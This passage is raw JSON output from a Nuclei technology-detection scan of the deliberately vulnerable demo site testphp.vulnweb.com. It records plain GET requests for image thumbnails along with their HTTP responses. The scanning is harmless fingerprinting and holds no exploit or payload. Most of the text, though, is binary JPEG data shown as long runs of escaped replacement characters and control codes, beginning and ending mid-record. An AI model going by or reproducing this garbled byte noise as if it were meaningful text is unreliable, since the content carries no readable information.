v\\ufffd\\ufffd\\ufffdr9\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdו\\ufffd\\ufffd\\ufffd7%\\ufffd9\\ufffd\\ufffd5N\\ufffd=?\\ufffdס\\ufffd\\ufffd~Ne\\ufffd\\ufffd\\u001eX\\ufffd)Wȅ)J\\u0000R\\ufffd\\ufffd\\u0005)J\\u0000\\ufffd\\ufffd^ɧjVװ\\ufffd2[Ȳ\\ufffde\\u000c\\t\\u00078 \\ufffd\\u0008\\ufffd\\u0011\\ufffd\\ufffd۾\\ufffd\\ufffdP\\ufffdM\\ufffdFb\\ufffdH\\ufffd\\ufffd\\u000b\\ufffd\\\\+/\\u0003\\ufffd\\u000e\\t\\ufffd\\u0013\\ufffd\\ufffd\\ufffdj\\ufffdtް\\ufffd,\\ufffd\\ufffdk\\u0015t{kv-\\u0018 \\ufffd\\\\\\ufffd\\u0006\\ufffd\\u0012H\\ufffd\\u0026\\ufffd\\ufffd\\ufffd\\u0004un2\\ufffd\\ufffd\\ufffdznu\\ufffd\\ufffd}#]\\u000f:\\ufffd\\ufffd=9a\\ufffd~ď\\ufffd\\u001a\\ufffd\\ufffdj\\ufffdV\\ufffd\\ufffd\\ufffdʪ\\u00103\\ufffd\\ufffd\\u0006I\\u001e\\ufffd\\ufffd{r\\u0007\\u0015\\ufffd4\\u001dXKio{lΚh\\ufffd\\ufffd)%\\u001e\\ufffd\\u0018\\ufffd\\ufffd\\u001d\\ufffd\\u001c\\u0015\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\u001da\\u0016\\ufffdu\\u0004s\\ufffdC\\u0018\\u000b$C'w\\ufffd\\u0004\\ufffd\\ufffdn\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0014]\\ufffd\\ufffdG,\\ufffdu7_ZOc\\u0006\\ufffd\\u0010H\\ufffdl\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd s\\ufffd\\ufffd\\u001fp\\u0006@'\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdK4\\u0010\\ufffd{\\u0015IJ@]\\ufffd\\u0016\\u0000m\\ny\\ufffd8\\u0018\\ufffd\\ufffd\\ufffd\\u001a\\ufffdɼ\\ufffd.n\\ufffd\\ufffd3J\\ufffd\\u0015\\ufffd\\ufffdI\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffd#\\ufffdԸ\\ufffdり\\ufffdY\\ufffdz\\ufffd\\u000b\\ufffd\\ufffd\\ufffd}F\\ufffd\\u0012\\u001a7\\ufffd\\ufffdubC\\ufffd\\ufffd\\ufffd\\ufffdx8\\ufffd\\ufffd8\\ufffdZ.\\ufffd\\ufffd\\ufffdv\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\u001fO\\ufffdI\\u000c\\ufffd\\ufffdF\\ufffd\\ufffd \\ufffd#\\ufffd\\u0013\\ufffdV\\ufffdU\\ufffd\\u0008\\ufffd\\ufffdcn\\u0008\\ufffd\\ufffd\\ufffdrX\\ufffd\\ufffde\\ufffd\\ufffd|\\ufffd=\\ufffd\\ufffdA\\ufffd(PB\\ufffd\\ufffdm\\\\\\u001eG\\n\\ufffd\\ufffd\\ufffd'\\u0000V\\ufffd\\ufffd\\rA\\ufffdMf\\ufffd\\ufffd\\ufffdw\\ufffd!*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffdQU\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\u0007J\\ufffdK\\ufffdJR\\ufffd\\u0018)JP\\u0002\\ufffd\\ufffd\\u0000)JP\\u0002\\ufffd\\ufffd\\u0000)JP\\u0006ᖳq\\ufffd\\ufffd]?%\\ufffd\\ry\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd \\ufffd\\u0008\\ufffd;f\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd\\ufffdۉ\\ufffd\\n\\ufffdY\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffdX\\ufffdQ\\ufffdN\\u0000\\ufffd$\\ufffd\\ufffdiJ\\ufffd\\u0018\\ufffds\\ufffd\\ufffdHߤ\\ufffdҔ\\ufffd$b\\ufffd\\ufffd\\u0000)JP\\u0002\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:35:04.617321394Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.57' 'http://testphp.vulnweb.com/pictures/6.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/8.jpg.tn\",\"path\":\"/pictures/8.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/8.jpg.tn\",\"request\":\"GET /pictures/8.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 Edg/93.0.961.52\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4139\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:35:04 GMT\\r\\nEtag: \\\"4dca64a1-102b\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0000\\u0002\\u0003\\u0004\\u0005\\u0001\\u0007\\u0008\\ufffd\\ufffd\\u0000;\\u0010\\u0000\\u0001\\u0003\\u0002\\u0004\\u0002\\u0006\\u0008\\u0005\\u0004\\u0002\\u0003\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0000\\u0004\\u0005\\u0012!1AQ\\u0006\\u0013\\\"aq\\ufffd\\u00142T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$B\\ufffd\\ufffd\\ufffd\\u0015#3\\ufffdRb4r\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0000\\u0003\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000(\\u0011\\u0000\\u0002\\u0001\\u0003\\u0003\\u0004\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011!\\u0004\\u00141\\u0005\\u0012AQ\\u0013\\u0015\\\"B2ab\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffdS\\ufffdK\\ufffd\\ufffd@\\ufffd\\u001bU\\u0010z\\ufffd~\\u001d*D\\ufffd\\ufffd\\ufffd@e\\ufffd\\ufffd\\u0012+\\ufffdoQ\\ufffd\\ufffdVߩ\\ufffd}I\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{9%L\\ufffdOy\\u0014ÃX\\ufffdz\\ufffd?\\ufffd\\ufffdh\\ufffd\\\"2\\ufffd\\ufffd0\\u000f\\ufffd5ޤѺ\\ufffd\\u000bU\\ufffd\\ufffdZ|\\u000c\\ufffd\\ufffd\\ufffdvv\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\u0003)\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffdR\\ufffd\\ufffd\\ufffdEã\\ufffdo\\ufffdt\\u001f\\u0014\\nc\\ufffd5\\ufffduB\\ufffd\\u000fq\\ufffd\\ufffd\\ufffd\\ufffd\\u001b\\ufffd\\ufffd\\ufffdt\\ufffdH\\ufffd)\\ufffdl\\u0007\\ufffd\\ufffd N\\u0015{\\u001e\\ufffd\\u0003\\ufffdU]\\ufffd7\\u0012`\\ufffd\\tM\\ufffd\\ufffdaT\\ufffd\\ufffdh\\ufffdk\\ufffd-\\u0026\\u001el)=\\ufffd\\u0002\\ufffdF\\u0013k\\ufffd\\ufffd\\u0000\\u0018\\ufffd\\ufffd\\u0000\\ufffdW6\\ufffd\\ufffd$\\ufffd\\ufffdS\\ufffd\\ufffdu\\ufffd\\u000ey\\ufffdeQ\\ufffd\\ufffd\\u0015\\ufffdI9g\\ufffd\\ufffd\\u0017\\ufffd0$\\ufffd\\u0015\\ufffd\\ufffd56\\u000c\\ufffdm\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdN\\ufffdOq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdƲh|\\ufffd\\ufffd\\ufffdI/2\\u001a,-\\ufffd\\ufffd\\ufffd$w\\u001d~uE\\ufffd[ \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\\"\\u003c\\ufffdH\\ufffd\\u000c\\ufffd\\ufffd\\u0000;\\ufffd\\u0015R+.A\\ufffd\\ufffdG.F\\u0018K\\u0003vTڞ\\ufffde\\u0013\\ufffd\\ufffd\\u003e\\u0000\\ufffd\\u0002p\\u0007`\\ufffd_\\ufffd:\\ufffd\\u0018\\u0002\\ufffd\\u00000A\\ufffdދ\\ufffdC\\ufffd\\\\!\\ufffd\\u001eJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n\\ufffdH\\ufffdU+Z\\ufffdwQkXBS\\ufffdm\\ufffd\\u0014װ\\ufffd3B\\ufffdȎ\\u0019\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd+J7\\ufffd\\t\\ufffd\\u0000\\ufffdhI\\ufffd\\ufffd\\ufffd\\u0016j\\u0003\\ufffdG΋\\ufffd\\ufffd{C?\\u0018\\ufffd\\u0013`6\\ufffdd\\ufffd\\ufffd3\\ufffd=s\\ufffd\\ufffd`\\ufffd\\ufffd(\\ufffdȟ3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001b'\\ufffd\\ufffdwཥ\\ufffd\\ufffdW\\u0005\\ufffdM|b\\ufffd\\ufffd\\u001fW\\u0000\\u003cظ\\u0007\\ufffd\\t\\ufffd\\u0015Q\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001e%?J3\\ufffd\\u000f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\u000e7\\u000c\\ufffdb\\ufffdօt\\ufffd 3\\ufffd.\\u0006\\ufffd\\ufffd\\ufffd趹\\u001f\\ufffd\\ufffd\\ufffd\\ufffdFYl=\\ufffd\\ufffd\\ufffdR\\ufffda\\ufffd\\u000c\\ufffdB\\ufffd\\ufffd\\ufffdYO\\ufffd\\u001f\\ufffd\\ufffd\\ufffdC_:i\\ufffd\\ufffdײ\\ufffd\\ufffdFY,=\\ufffd\\ufffd\\ufffdR\\ufffda\\ufffd\\u000c\\ufffdb\\ufffd\\ufffd\\ufffdYO\\ufffd\\u0012\\ufffd\\u0007\\ufffde@Gq\\ufffdՅ\\ufffd\\u0026G\\ufffd\\ufffd\\ufffd[\\u000fhg\\ufffd\\u0014\\ufffdX{C?\\u0018\\ufffd\\ufffd\\u0019t\\ufffd \\u00118j\\ufffd\\u0012\\ufffd\\u0011\\ufffdjSa;2G\\ufffd\\u0013F\\ufffd,=\\ufffd\\ufffd\\ufffdRɇ\\ufffdC?\\u0018\\ufffd\\ufffd#\\ufffd\\ufffd`8\\ufffdZOe$yԨ\\ufffdRwfO2h\\ufffd%\\ufffd\\ufffd3\\ufffd\\ufffdYp\\ufffd\\u0000hg\\ufffd\\u00147\\ufffd}6\\ufffd\\ufffd\\u0010\\u000c(\\ufffd\\ufffd\\u001esK\\ufffd\\ufffdDe\\u0003\\ufffdQ\\ufffd\\u0016#k\\ufffd~1K\\ufffd^\\ufffd\\ufffd\\ufffd(oE\\ufffd\\ufffd~\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffd\\ufffdOvSL\\u00188V\\ufffd\\u0008O\\ufffd@\\ufffd\\ufffd{K_\\u0018\\ufffdE\\ufffd\\ufffd埌Q\\ufffd1\\ufffdNH\\ufffd\\u001c\\ufffd\\ufffd\\ufffd M\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd\\ufffd;W$\\ufffdӷ\\ufffd\\r\\ufffd\\rZ\\ufffd$;m\\ufffdc(\\n\\ufffdT\\u0001\\ufffdI\\ufffd4\\ufffd\\ufffd~\\ufffd\\ufffdŅ\\ufffd׽z\\u0016\\ufffd\\u0014 \\u0001\\u0000\\ufffdE\\ufffd$\\ufffdxk\\u001bl8p\\ufffdϨR\\ufffd\\u0008\\ufffd\\u001d-Ŵ;\\ufffd\\ufffd\\ufffdL!\\ufffd\\ufffdV\\u0016\\ufffd\\u0002\\ufffd+\\ufffd\\u0003\\ufffd\\ufffd\\u001f|\\ufffdu\\ufffd\\ufffdb\\u0008k\\ufffd.:\\ufffd\\u0008\\ufffdLƁZ\\ufffdЃ\\ufffdX\\ufffd\\ufffd\\ufffdh/\\ufffd\\ufffd\\ufffd.B\\ufffdeH))!! H\\ufffd!;lg\\ufffd0▪E\\ufffd}P}\\ufffd(\\ufffd\\ufffd\\ufffd)#(%[\\u001d\\ufffd\\ufffd\\ufffdYWQ\\ufffdJ\\ufffd.\\ufffd\\ufffd\\u0000\\ufffd]\\ufffd\\ufffdb/\\u0007\\u0002\\u001cs\\ufffd@P$\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\ufffd\\ufffd\\u0012\\ufffdSM\\ufffd^\\u000e-A\\u0000\\t܉\\ufffdG\\u0018\\ufffd\\u0016\\ufffd\\ufffdo\\u001crԼ\\ufffdE\\ufffdu\\ufffd+*\\ufffd\\ufffd\\ufffd\\u0000F\\ufffd.\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd˶\\ufffd\\u001a\\ufffd\\ufffd-#+\\ufffd7\\u0004J\\u0013\\ufffda\\u001a\\ufffd \\ufffd\\ufffd\\u0002$M\\tu\\u0019\\ufffd\\ufffd\\ufffd;e\\ufffd\\ufffdYx\\ufffd(\\ufffd6\\u001c\\ufffd!\\u0004\\ufffdY\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffd\\u000cN\\ufffd\\u0019E\\ufffdn\\ufffd\\ufffd#\\ufffdm\\ufffd\\ufffd9\\ufffd\\ufffd\\ufffdH1\\ufffd\\u001f\\ufffd\\ufffdڠ\\ufffd\\ufffdɈ\\ufffd\\ufffd\\ufffd[j\\u0015\\ufffd!\\ufffd0\\ufffd\\ufffd\\u0003\\u0007\\ufffd\\u0026\\\"\\u000e\\ufffdj)\\ufffd8\\ufffd\\ufffdIq\\ufffdf\\ufffd\\ufffd}\\ufffd\\ufffd\\u0008\\n'|\\ufffd\\ufffd\\ufffd\\ufffdY+7r\\ufffdJ\\u0017\\ufffd7\\ufffdI\\ufffdU~\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGajȩ\\ufffd\\u003e`x\\ufffd\\ufffdĶ\\ufffd\\ufffd8\\ufffd\\ufffd6\\ufffd]:P\\ufffdFE\\ufffd+*Q\\ufffd\\u0012F\\ufffd\\u00065\\u0010\\ufffdTq\\ufffdC\\u0007yƔ\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\u0011\\ufffd=\\ufffd\\ufffd\\u0019'\\ufffdy\\ufffdv\\ufffdl\\ufffdp\\ufffd_\\u000cqn+\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd$q\\u001eQ\\ufffd?\\u001aYW\\ufffd\\ufffd\\ufffd\\ufffd\\u000fd}\\u001a\\ufffd\\ufffdq7\\u0015\\ufffd\\ufffd۔\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\t\\u0002\\u000f\\u00025\\u001ae\\u001cF\\ufffd\\ufffd\\ufffd8\\ufffd$\\ufffd\\u0016\\ufffd\\ufffd\\\\C\\u0004f\\ufffd\\ufffd2\\ufffd\\u0008\\ufffd\\u001a\\ufffd5\\u0011\\ufffd\\ufffd\\ufffd\\u0002\\ufffd\\ufffdî[\\ufffdKL\\ufffdխh%N\\u0013\\ufffdh\\ufffd\\u0004\\ufffd\\u001c\\u0001\\u0000o:\\ufffdd[\\ufffd]\\ufffdY\\\\\\ufffd\\ufffdбd\\ufffdW(\\u0005\\ufffd\\ufffd\\u0003S\\ufffd\\t\\ufffd\\u0013\\ufffd\\ufffdŨ\\ufffd{\\ufffd\\u0013\\ufffd\\u003cX4\\ufffd\\ufffd1\\u000b\\ufffd\\ufffd,ߘ\\u0004\\ufffd\\ufffd\\ufffd\\u0000\\u0012\\ufffd\\ufffd\\u003c9H\\ufffd\\ufffd4\\ufffdX\\ufffd\\ufffd\\r\\ufffdp]Y\\ufffd\\u0003\\ufffd\\u0000\\u0019\\\"7\\ufffdQ\\ufffd\\u0015\\ufffd/\\ufffdww\\ufffdu,\\\\:۩\\ufffd\\u0008\\ufffd*ˤ\\ufffd7\\u0018\\ufffd\\ufffd\\ufffdo\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd`k\\ufffd\\u001a]\\ufffd\\ufffdmEJ%Dd\\ufffd\\ufffd\\\"gS\\ufffd\\ufffd\\ufffd\\u0013\\ufffd=\\n\\ufffdhe\\ufffd\\ufffd1%J/\\u0016\\u000bn\\ufffdQ\\ufffd۾\\ufffd\\u001fq\\ufffd\\u003cم$\\ufffdj\\ufffd=.\\ufffdR\\ufffd/\\ufffdS\\ufffdhO\\u000e\\ufffd\\u0012\\ufffd$\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZe'e\\r9@\\ufffd֯\\ufffdݦ'\\ufffd\\ufffd\\ufffd\\u0012P\\u0014\\ufffd\\u001c\\ufffd\\ufffd\\ufffdse\\ufffd\\ufffd\\u0003A\\ufffd\\ufffdjZ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-4\\ufffd\\u0000Y\\u001bk\\ufffd\\ufffd\\ufffd\\u0000\\ufffdr\\ufffdTBGorv\\u001bӏK\\ufffd\\ufffd\\ufffd}I\\u0003i\\\\\\ufffd\\ufffd7\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffdT\\ufffd\\u00044\\ufffdk\\ufffd\\u001d\\ufffd$\\ufffd\\ufffd;N\\u0013vm\\u0014\\ufffd\\ufffd\\ufffdܘ\\ufffdGw\\u0012|\\u0006\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\ufffd\\n\\ufffd.\\ufffdp\\ufffdt\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd皤\\u001d0\\ufffd*\\ufffd\\ufffd\\ufffd\\u001d\\ufffdSC\\u0016WV\\ufffdo\\ufffd9\\ufffd|\\ufffd\\ufffdC\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffdC\\\"4\\ufffd\\ufffd\\ufffd\\u0013R\\ufffdv\\ufffd.\\ufffd\\ufffd\\u0019\\ufffd\\u001bG\\ufffd\\ufffdVHL\\u0002\\u0006i\\ufffd\\u0006\\ufffd\\ufffd\\ufffd\\ufffdޒ]B\\nV\\ufffd\\u0019i\\ufffdl\\ufffdβ\\ufffdF\\u0012\\u001ce\\ufffd\\ufffd\\ufffdЌ\\ufffd@\\u000e\\ufffd\\u003e\\u0014\\ufffd\\ufffd\\u0016\\ufffdYԄ\\ufffdⳒN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\u0016\\ufffdu\\ufffd\\ufffd\\ufffd\\u0010BB\\ufffd\\u001c\\ufffdT\\ufffd\\ufffd\\ufffd\\u001c7\\ufffd4.\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd(\\ufffdV\\u0008B3\\ufffd\\ufffd6\\ufffdغ\\ufffd\\ufffd/\\ufffd\\u0012îu\\ufffd\\ufffd$\\ufffdW]@\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\ufffda͵\\ufffd4\\u0014\\u001a\\ufffd\\u001ey\\ufffd\\n@\\ufffd'\\ufffd\\ufffd\\u000c\\ufffd\\u0004F\\ufffd\\ufffd\\u000e\\u001a\\ufffd{\\ufffd\\ufffd\\ufffdܦ\\ufffd(\\ufffd\\ufffdFl\\ufffd\\ufffd\\ufffd*ݻ*\\ufffd\\ufffdT\\u0014\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd*\\u0007\\ufffd\\u0006i\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0010\\ufffdt\\ufffd\\ufffd\\ufffd!qw\\ufffd\\ufffdݷ\\ufffd\\u003e\\ufffd\\t\\ufffdcI\\u0011\\ufffd\\ufffdY\\ufffd[\\u00168\\ufffd\\ufffd-\\u0015t\\ufffd\\u003e\\ufffd\\ufffdP\\ufffdҳ\\u0015\\u0026`(\\ufffd\\u001a\\ufffd\\ufffdüP-\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdH\\u001dA=\\ufffd\\ufffdӕ\\u0016٭\\ufffdp\\ufffdmՙ\\ufffdtR\\u0002\\ufffd\\ufffd\\ufffd\\u000f\\ufffdw\\ufffd\\ufffd\\ufffd8G)\\u0007\\ufffdK\\ufffd]N4\\ufffdWn\\ufffd\\u0010\\ufffd\\u0003,\\ufffd\\u000cs\\u0007]\\ufffd3\\\"^HPK\\ufffdF\\ufffdH\\u001a\\ufffdp\\ufffdoDNa]K\\ufffd2\\ufffd\\ufffdHP\\u0008\\ufffd\\ufffdy\\ufffd}\\ufffd\\ufffdU\\ufffd,57=Z\\ufffdn\\ufffd\\ufffd1\\u0019c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\u0016\\u0001c\\n͉\\ufffd\\u0016\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd\\u0008\\ufffd\\ufffdJں\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffdB\\u000bn%3\\u0005\\u0000\\ufffdF\\ufffd{ֵ\\ufffd\\u001bl\\u0008B\\u0019lI\\ufffd\\ufffd))H\\ufffd\\ufffd\\u0003a\\ufffd\\u001d\\ufffd\\ufffdS\\\\\\ufffdn\\u001dYm$+)\\ufffd刐 \\ufffd\\u000c\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu'\\ufffd\\ufffd0\\ufffd\\ufffdҜ\\ufffdi!JP\\ufffd,L\\ufffd\\u0001\\u001aL\\ufffd\\ufffd\\u001fJ\\ufffd|\\ufffd,p\\ufffdKRB^t\\u0005\\ufffd\\u0000\\ufffd\\ufffd\\ufffdh;\\ufffdj\\ufffdͲ\\ufffdԧs\\ufffd\\ufffdH\\ufffdV\\ufffd\\ufffdm\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdC8\\ufffd,\\ufffd!\\ufffd\\ufffd\\ufffd;\\ufffdbg:\\ufffd\\u0004\\ufffd5\\ufffd\\u0018\\u001a\\ufffd\\ufffd.\\ufffd\\u001e\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffd\\u0002oqE\\ufffd\\u0013n\\ufffd\\ufffdR\\u001a \\ufffd\\u0002x}k\\ufffdz\\u0011\\ufffd3\\ufffd\\ufffd\\nn\\ufffd\\ufffd9n\\u0002V\\ufffd$\\ufffd\\ufffd\\ufffdQ׈\\u0002I܃\\ufffdy\\u0026 \\ufffd\\\\\\ufffdT\\ufffd\\ufffdF\\ufffdL@\\u001e\\u0002\\ufffd\\ufffd\\ufffd^\\u001e\\ufffdk\\ufffdu\\ufffd\\ufffd\\ufffdD\\u0018\\ufffd\\ufffd+\\ufffd^\\ufffd\\ufffd\\u0004\\ufffd\\u0019\\u0013\\ufffdY\\ufffd\\u0015\\ufffd\\ufffd\\u001b[莩\\ufffdħi\\ufffd\\u000f\\ufffd:\\ufffd\\ufffd\\ufffdc\\ufffd\\u003c\\u000b\\ufffd6\\u0014d\\ufffd*$\\ufffd\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd]\\ufffd\\tm\\ufffd\\ufffd\\ufffd\\ufffd\\u0002\\u000e\\ufffdR\\ufffd\\ufffdb\\ufffd\\ufffd\\ufffd)\\u0026 \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd@\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd2r\\ufffd)L\\ufffd\\u0000\\ufffd\\u0000\\ufffd\\ufffd\\ufffd,=\\ufffdш\\u000b\\ufffd”\\ufffd܅(\\t\\ufffd\\ufffd\\u0015\\ufffd\\u0004\\ufffd?:1w\\u0017\\ufffd\\ufffdZP\\ufffd\\ufffd%\\t\\ufffd`(\\ufffd\\ufffd\\ufffdD\\ufffd\\ufffd.\\ufffd \\ufffdq\\ufffd\\ufffd\\u0000!\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffdY\\ufffdw+\\ufffd\\ufffd\\u0012\\ufffd,)X\\ufffda`6\\ufffd\\u0018\\ufffd\\ufffd*x\\ufffd1\\u0014K\\ufffdZ\\ufffd\\ufffd\\u0007\\ufffdz\\ufffd,\\ufffd\\ufffdHS\\u0004\\ufffd)\\u0006\\u000c\\ufffdG\\u0001 \\ufffd\\ufffd\\ufffd\\u0018\\ufffd\\ufffdıD\\ufffd\\ufffd\\ufffd*ԭZ\\u00007\\ufffd\\ufffd\\u0015\\ufffd\\ufffd\\\\=\\t’\\ufffdR-\\ufffd\\ufffd\\ufffd\\u0010]\\ufffdh\\ufffd\\ufffd]~T\\ufffd\\ufffde(Ő\\u0005\\ufffdp\\ufffd\\ufffd\\ufffd\\u0004\\u0003\\ufffd\\u001a\\ufffd*+2kZ\\ufffd\\u0015Z\\u0000D\\u0014\\u0008\\ufffdYB9V\\ufffdp\\u0002L\\ufffdԤ\\ufffd\\ufffdIWn\\ufffd\\ufffd\\u0016\\ufffd\\ufffdm\\u0026@\\ufffd\\ufffdL\\ufffd37\\u001a\\ufffd\\ufffdRX)YЂ)\\ufffd\\ufffd \\tN\\u001eop\\ufffd/\\ufffdR\\ufffd\\ufffd\\u000eGF\\ufffdDhF\\ufffd6:\\ufffdM2ѻ\\ufffd[\\ufffd\\ufffd\\u0001SZ\\u0012\\ufffdǺ\\ufffdC\\ufffdAkv\\ufffd\\ufffdQ\\r\\ufffd\\u0018:\\ufffdH\\ufffd\\ufffdD*]\\ufffdU\\ufffdH\\n\\ufffdII\\u0013\\u001bH\\u001e\\u0015\\ufffdnQn-`(\\ufffd\\ufffd\\ufffd\\ufffdG\\u0010\\ufffd\\u0013\\ufffdv\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffd5a\\u0017\\ufffdD\\ufffd\\ufffd\\u0000\\ufffd\\ufffdu\\ufffd\\ufffd\\ufffdx\\ufffd\\u0008y\\ufffd\\ufffd\\ufffd\\u0000\\u0002#\\ufffd\\ufffd\\u001bT\\ufffd\\ufffdJ\\ufffdz\\ufffd\\u0007Q\\ufffd\\ufffdc_\\ufffdY%L(%o\\u0010hu\\ufffd7\\tZb\\u0012\\ufffd\\\"u\\ufffd\\ufffdH\\ufffdTn\\\\\\ufffdܽVT\\u0015+\\ufffd\\n\\ufffd\\u0012\\u000e\\ufffd\\ufffdX\\ufffd踸jє\\ufffd\\u001a\\ufffd~\\ufffd뫺ZD\\ufffd\\ufffd\\ufffdc0\\u0004\\u001f\\ufff